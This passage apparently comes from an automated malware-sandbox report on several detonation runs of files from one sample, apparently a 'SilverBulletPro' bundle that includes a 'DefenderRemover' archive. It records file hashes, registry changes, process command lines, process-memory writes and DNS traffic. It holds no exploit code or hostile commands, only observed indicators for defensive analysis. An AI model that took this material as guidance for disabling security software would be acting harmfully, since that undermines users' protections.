| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 82bac6fce939eae430b9026af0652640 |
| SHA1 | 302d6396f755a86b0dbd525c7a5b240656a2039a |
| SHA256 | c0a43af23fa910206e3d6507243d572564b1afc64dbb02ff6a24ff039aaa4511 |
| SHA512 | 6348a61b2835fb84cb22d570766534c819ac7077b683345057e1afae8cf5c23455499e28bba3aa736dfec3de186ac4b3c5276c16c55d16b311825570a794d7f4 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
140s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\ios-arm64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240419-en
Max time kernel
75s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Requests.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
80s
Max time network
101s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\maccatalyst-arm64\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| NL | 52.111.243.30:443 | | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
70s
Max time network
99s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.CLI.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
142s
Max time network
156s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "3488757114" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31111933" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1504 wrote to memory of 1068 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
| PID 1504 wrote to memory of 1068 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
Processes
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\bin\Wpf.Ui.xml"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\bin\Wpf.Ui.xml
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
75s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\dbip-country-lite.mmdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
80s
Max time network
96s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\browser-wasm\nativeassets\net8.0\e_sqlite3.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
70s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\ios-arm\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
137s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\ios-armv7s\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
77s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\教程\DefenderRemover.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:44
Platform
win11-20240426-en
Max time kernel
330s
Max time network
268s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LOCALSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
